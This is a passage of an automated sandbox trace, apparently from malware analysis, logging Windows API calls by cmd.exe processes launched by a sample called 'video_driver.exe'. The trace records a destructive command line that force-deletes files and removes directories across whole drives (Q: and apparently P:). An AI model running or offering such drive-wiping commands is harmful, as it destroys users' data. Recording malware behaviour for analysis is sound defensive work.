"c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0064.853] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf6fc | out: lpFindFileData=0x1cf6fc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x525760 [0064.853] FindClose (in: hFindFile=0x525760 | out: hFindFile=0x525760) returned 1 [0064.854] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x1cf6fc | out: lpFindFileData=0x1cf6fc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x22a8020, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x22a8020, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x525760 [0064.854] FindClose (in: hFindFile=0x525760 | out: hFindFile=0x525760) returned 1 [0064.854] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0064.854] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x1cf6fc | out: lpFindFileData=0x1cf6fc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3ff6f00, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x3ff6f00, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x525760 [0064.854] FindClose (in: hFindFile=0x525760 | out: hFindFile=0x525760) returned 1 [0064.854] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0064.854] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0064.855] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0064.855] GetProcessHeap () returned 0x510000 [0064.855] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x524c70 | out: hHeap=0x510000) returned 1 [0064.855] GetEnvironmentStringsW () returned 0x524180* [0064.855] GetProcessHeap () returned 0x510000 [0064.855] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xb36) returned 0x525fa0 [0064.855] FreeEnvironmentStringsW (penv=0x524180) returned 1 [0064.855] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0064.855] GetProcessHeap () returned 0x510000 [0064.855] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5217c8 | out: hHeap=0x510000) returned 1 [0064.855] GetProcessHeap () returned 0x510000 [0064.855] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x400e) returned 0x526ae0 [0064.856] GetProcessHeap () returned 0x510000 [0064.856] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xa0) returned 0x522e50 [0064.856] GetProcessHeap () returned 0x510000 [0064.856] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526ae0 | out: hHeap=0x510000) returned 1 [0064.856] GetConsoleOutputCP () returned 0x1b5 [0064.856] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0064.856] GetUserDefaultLCID () returned 0x409 [0064.857] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0064.858] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cfac0, cchData=128 | out: lpLCData="0") returned 2 [0064.858] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cfac0, cchData=128 | out: lpLCData="0") returned 2 [0064.858] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cfac0, cchData=128 | out: lpLCData="1") returned 2 [0064.858] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0064.858] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0064.858] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0064.858] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0064.858] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0064.858] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0064.858] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0064.858] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0064.858] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0064.858] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0064.859] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0064.860] GetProcessHeap () returned 0x510000 [0064.860] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x20c) returned 0x522ef8 [0064.860] GetConsoleTitleW (in: lpConsoleTitle=0x522ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0064.861] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0064.861] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0064.861] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0064.861] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0064.861] GetProcessHeap () returned 0x510000 [0064.862] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x400a) returned 0x526ae0 [0064.862] GetProcessHeap () returned 0x510000 [0064.862] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x4008) returned 0x52aaf8 [0064.862] GetProcessHeap () returned 0x510000 [0064.862] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x1a) returned 0x5257e0 [0064.862] GetEnvironmentVariableW (in: lpName="p IN (\"P", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0064.862] _wcsicmp (_String1="p IN (\"P", _String2="CD") returned 13 [0064.862] _wcsicmp (_String1="p IN (\"P", _String2="ERRORLEVEL") returned 11 [0064.862] _wcsicmp (_String1="p IN (\"P", _String2="CMDEXTVERSION") returned 13 [0064.862] _wcsicmp (_String1="p IN (\"P", _String2="CMDCMDLINE") returned 13 [0064.862] _wcsicmp (_String1="p IN (\"P", _String2="DATE") returned 12 [0064.862] _wcsicmp (_String1="p IN (\"P", _String2="TIME") returned -4 [0064.862] _wcsicmp (_String1="p IN (\"P", _String2="RANDOM") returned -2 [0064.863] _wcsicmp (_String1="p IN (\"P", _String2="HIGHESTNUMANODENUMBER") returned 8 [0064.863] GetProcessHeap () returned 0x510000 [0064.863] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5257e0 | out: hHeap=0x510000) returned 1 [0064.863] GetProcessHeap () returned 0x510000 [0064.863] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x52aaf8 | out: hHeap=0x510000) returned 1 [0064.863] GetProcessHeap () returned 0x510000 [0064.863] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x4008) returned 0x52aaf8 [0064.863] GetProcessHeap () returned 0x510000 [0064.863] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x52aaf8 | out: hHeap=0x510000) returned 1 [0064.863] GetProcessHeap () returned 0x510000 [0064.863] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526ae0 | out: hHeap=0x510000) returned 1 [0064.863] _wcsicmp (_String1="if", _String2=")") returned 64 [0064.863] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0064.863] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0064.863] _wcsicmp (_String1="IF", _String2="if") returned 0 [0064.863] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0064.864] GetProcessHeap () returned 0x510000 [0064.864] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x58) returned 0x523110 [0064.864] GetProcessHeap () returned 0x510000 [0064.864] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xe) returned 0x51ffc0 [0064.864] GetProcessHeap () returned 0x510000 [0064.864] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x20) returned 0x5257e0 [0064.865] GetProcessHeap () returned 0x510000 [0064.865] RtlReAllocateHeap (Heap=0x510000, Flags=0x0, Ptr=0x5257e0, Size=0x16) returned 0x521800 [0064.865] GetProcessHeap () returned 0x510000 [0064.865] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x521800) returned 0x16 [0064.865] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0064.866] GetProcessHeap () returned 0x510000 [0064.866] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x58) returned 0x523170 [0064.866] GetProcessHeap () returned 0x510000 [0064.866] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x14) returned 0x5231d0 [0064.866] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0064.866] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0064.866] GetProcessHeap () returned 0x510000 [0064.866] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x12) returned 0x5231f0 [0064.866] GetProcessHeap () returned 0x510000 [0064.866] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x1c) returned 0x5257e0 [0064.866] GetProcessHeap () returned 0x510000 [0064.866] RtlReAllocateHeap (Heap=0x510000, Flags=0x0, Ptr=0x5257e0, Size=0x14) returned 0x523210 [0064.866] GetProcessHeap () returned 0x510000 [0064.867] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x523210) returned 0x14 [0064.867] _wcsicmp (_String1="del", _String2=")") returned 59 [0064.867] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0064.867] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0064.867] _wcsicmp (_String1="IF", _String2="del") returned 5 [0064.867] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0064.867] _wcsicmp (_String1="REM", _String2="del") returned 14 [0064.867] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0064.867] GetProcessHeap () returned 0x510000 [0064.867] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x58) returned 0x523230 [0064.867] GetProcessHeap () returned 0x510000 [0064.867] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x10) returned 0x51ffd8 [0064.868] GetProcessHeap () returned 0x510000 [0064.868] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x28) returned 0x523290 [0064.869] GetProcessHeap () returned 0x510000 [0064.869] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x58) returned 0x5232c0 [0064.869] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0064.869] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0064.869] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0064.869] GetProcessHeap () returned 0x510000 [0064.869] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x58) returned 0x523320 [0064.869] GetProcessHeap () returned 0x510000 [0064.869] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x44) returned 0x523380 [0064.869] GetProcessHeap () returned 0x510000 [0064.869] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x14) returned 0x5233d0 [0064.870] GetProcessHeap () returned 0x510000 [0064.870] RtlReAllocateHeap (Heap=0x510000, Flags=0x0, Ptr=0x5233d0, Size=0x12) returned 0x5233d0 [0064.870] GetProcessHeap () returned 0x510000 [0064.870] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5233d0) returned 0x12 [0064.870] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0064.870] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0064.870] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0064.870] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0064.870] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0064.870] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0064.871] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0064.871] GetProcessHeap () returned 0x510000 [0064.871] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x12) returned 0x5233f0 [0064.871] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0064.872] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0064.872] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0064.872] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0064.872] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0064.872] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0064.872] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0064.872] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0064.872] GetProcessHeap () returned 0x510000 [0064.872] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x58) returned 0x523410 [0064.872] GetProcessHeap () returned 0x510000 [0064.872] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x14) returned 0x523470 [0064.872] GetProcessHeap () returned 0x510000 [0064.872] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x20) returned 0x5257e0 [0064.873] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0064.875] GetFullPathNameW (in: lpFileName="P:", nBufferLength=0x208, lpBuffer=0x1cf7b0, lpFilePart=0x1cf55c | out: lpBuffer="P:\\", lpFilePart=0x1cf55c*=0x0) returned 0x3 [0064.875] wcsncmp (_String1="P:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -12 [0064.879] GetFileAttributesW (lpFileName="P:\\" (normalized: "p:")) returned 0xffffffff [0064.879] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.879] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0064.880] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.880] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0064.880] _get_osfhandle (_FileHandle=0) returned 0x3 [0064.880] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0064.880] SetConsoleInputExeNameW () returned 0x1 [0064.880] GetConsoleOutputCP () returned 0x1b5 [0064.881] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0064.881] SetThreadUILanguage (LangId=0x0) returned 0x409 [0064.881] exit (_Code=0) Process: id = "37" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x42818000" os_pid = "0x9ec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"Q:\" del /f /s /q \"Q:\" & FOR /D %p IN (\"Q:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 65 os_tid = 0x618 [0064.966] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efdd4 | out: lpSystemTimeAsFileTime=0x2efdd4*(dwLowDateTime=0x4897ec0, dwHighDateTime=0x1d62400)) [0064.966] GetCurrentProcessId () returned 0x9ec [0064.966] GetCurrentThreadId () returned 0x618 [0064.966] GetTickCount () returned 0x1147aeb [0064.966] QueryPerformanceCounter (in: lpPerformanceCount=0x2efdcc | out: lpPerformanceCount=0x2efdcc*=18509949941) returned 1 [0064.967] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0064.967] __set_app_type (_Type=0x1) [0064.967] __p__fmode () returned 0x770331f4 [0064.967] __p__commode () returned 0x770331fc [0064.968] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0064.968] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0064.978] GetCurrentThreadId () returned 0x618 [0064.978] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x618) returned 0x60 [0064.978] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0064.978] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0064.978] SetThreadUILanguage (LangId=0x0) returned 0x409 [0064.979] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0064.979] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efd64 | out: phkResult=0x2efd64*=0x0) returned 0x2 [0064.979] VirtualQuery (in: lpAddress=0x2efd9b, lpBuffer=0x2efd34, dwLength=0x1c | out: lpBuffer=0x2efd34*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0064.979] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2efd34, dwLength=0x1c | out: lpBuffer=0x2efd34*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0064.979] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2efd34, dwLength=0x1c | out: lpBuffer=0x2efd34*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0064.979] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2efd34, dwLength=0x1c | out: lpBuffer=0x2efd34*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0064.979] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2efd34, dwLength=0x1c | out: lpBuffer=0x2efd34*(BaseAddress=0x2f0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x60000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0064.979] GetConsoleOutputCP () returned 0x1b5 [0064.979] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0064.979] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0064.979] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.979] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0064.980] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.980] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0064.980] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.980] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0064.980] _get_osfhandle (_FileHandle=0) returned 0x3 [0064.980] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0064.980] GetEnvironmentStringsW () returned 0x4420f8* [0064.980] GetProcessHeap () returned 0x430000 [0064.981] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xaca) returned 0x442bd0 [0064.981] FreeEnvironmentStringsW (penv=0x4420f8) returned 1 [0064.981] GetProcessHeap () returned 0x430000 [0064.981] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x4) returned 0x441898 [0064.981] GetEnvironmentStringsW () returned 0x4420f8* [0064.981] GetProcessHeap () returned 0x430000 [0064.981] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xaca) returned 0x4436a8 [0064.981] FreeEnvironmentStringsW (penv=0x4420f8) returned 1 [0064.981] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eecd4 | out: phkResult=0x2eecd4*=0x68) returned 0x0 [0064.981] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eecdc, lpData=0x2eece0, lpcbData=0x2eecd8*=0x1000 | out: lpType=0x2eecdc*=0x0, lpData=0x2eece0*=0x0, lpcbData=0x2eecd8*=0x1000) returned 0x2 [0064.981] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eecdc, lpData=0x2eece0, lpcbData=0x2eecd8*=0x1000 | out: lpType=0x2eecdc*=0x4, lpData=0x2eece0*=0x1, lpcbData=0x2eecd8*=0x4) returned 0x0 [0064.981] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eecdc, lpData=0x2eece0, lpcbData=0x2eecd8*=0x1000 | out: lpType=0x2eecdc*=0x0, lpData=0x2eece0*=0x1, lpcbData=0x2eecd8*=0x1000) returned 0x2 [0064.981] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eecdc, lpData=0x2eece0, lpcbData=0x2eecd8*=0x1000 | out: lpType=0x2eecdc*=0x4, lpData=0x2eece0*=0x0, lpcbData=0x2eecd8*=0x4) returned 0x0 [0064.982] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eecdc, lpData=0x2eece0, lpcbData=0x2eecd8*=0x1000 | out: lpType=0x2eecdc*=0x4, lpData=0x2eece0*=0x40, lpcbData=0x2eecd8*=0x4) returned 0x0 [0064.982] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eecdc, lpData=0x2eece0, lpcbData=0x2eecd8*=0x1000 | out: lpType=0x2eecdc*=0x4, lpData=0x2eece0*=0x40, lpcbData=0x2eecd8*=0x4) returned 0x0 [0064.982] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eecdc, lpData=0x2eece0, lpcbData=0x2eecd8*=0x1000 | out: lpType=0x2eecdc*=0x0, lpData=0x2eece0*=0x40, lpcbData=0x2eecd8*=0x1000) returned 0x2 [0064.982] RegCloseKey (hKey=0x68) returned 0x0 [0064.982] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eecd4 | out: phkResult=0x2eecd4*=0x68) returned 0x0 [0064.982] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eecdc, lpData=0x2eece0, lpcbData=0x2eecd8*=0x1000 | out: lpType=0x2eecdc*=0x0, lpData=0x2eece0*=0x40, lpcbData=0x2eecd8*=0x1000) returned 0x2 [0064.982] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eecdc, lpData=0x2eece0, lpcbData=0x2eecd8*=0x1000 | out: lpType=0x2eecdc*=0x4, lpData=0x2eece0*=0x1, lpcbData=0x2eecd8*=0x4) returned 0x0 [0064.982] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eecdc, lpData=0x2eece0, lpcbData=0x2eecd8*=0x1000 | out: lpType=0x2eecdc*=0x0, lpData=0x2eece0*=0x1, lpcbData=0x2eecd8*=0x1000) returned 0x2 [0064.982] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eecdc, lpData=0x2eece0, lpcbData=0x2eecd8*=0x1000 | out: lpType=0x2eecdc*=0x4, lpData=0x2eece0*=0x0, lpcbData=0x2eecd8*=0x4) returned 0x0 [0064.982] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eecdc, lpData=0x2eece0, lpcbData=0x2eecd8*=0x1000 | out: lpType=0x2eecdc*=0x4, lpData=0x2eece0*=0x9, lpcbData=0x2eecd8*=0x4) returned 0x0 [0064.982] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eecdc, lpData=0x2eece0, lpcbData=0x2eecd8*=0x1000 | out: lpType=0x2eecdc*=0x4, lpData=0x2eece0*=0x9, lpcbData=0x2eecd8*=0x4) returned 0x0 [0064.982] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eecdc, lpData=0x2eece0, lpcbData=0x2eecd8*=0x1000 | out: lpType=0x2eecdc*=0x0, lpData=0x2eece0*=0x9, lpcbData=0x2eecd8*=0x1000) returned 0x2 [0064.982] RegCloseKey (hKey=0x68) returned 0x0 [0064.982] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b6a [0064.982] srand (_Seed=0x5eb34b6a) [0064.982] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"Q:\" del /f /s /q \"Q:\" & FOR /D %p IN (\"Q:\") DO rmdir \"%p\" /s /q" [0064.982] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"Q:\" del /f /s /q \"Q:\" & FOR /D %p IN (\"Q:\") DO rmdir \"%p\" /s /q" [0064.983] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0064.983] GetProcessHeap () returned 0x430000 [0064.983] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x210) returned 0x4420f8 [0064.983] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x442100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0064.983] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0064.983] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0064.983] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0064.983] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0064.983] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0064.983] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 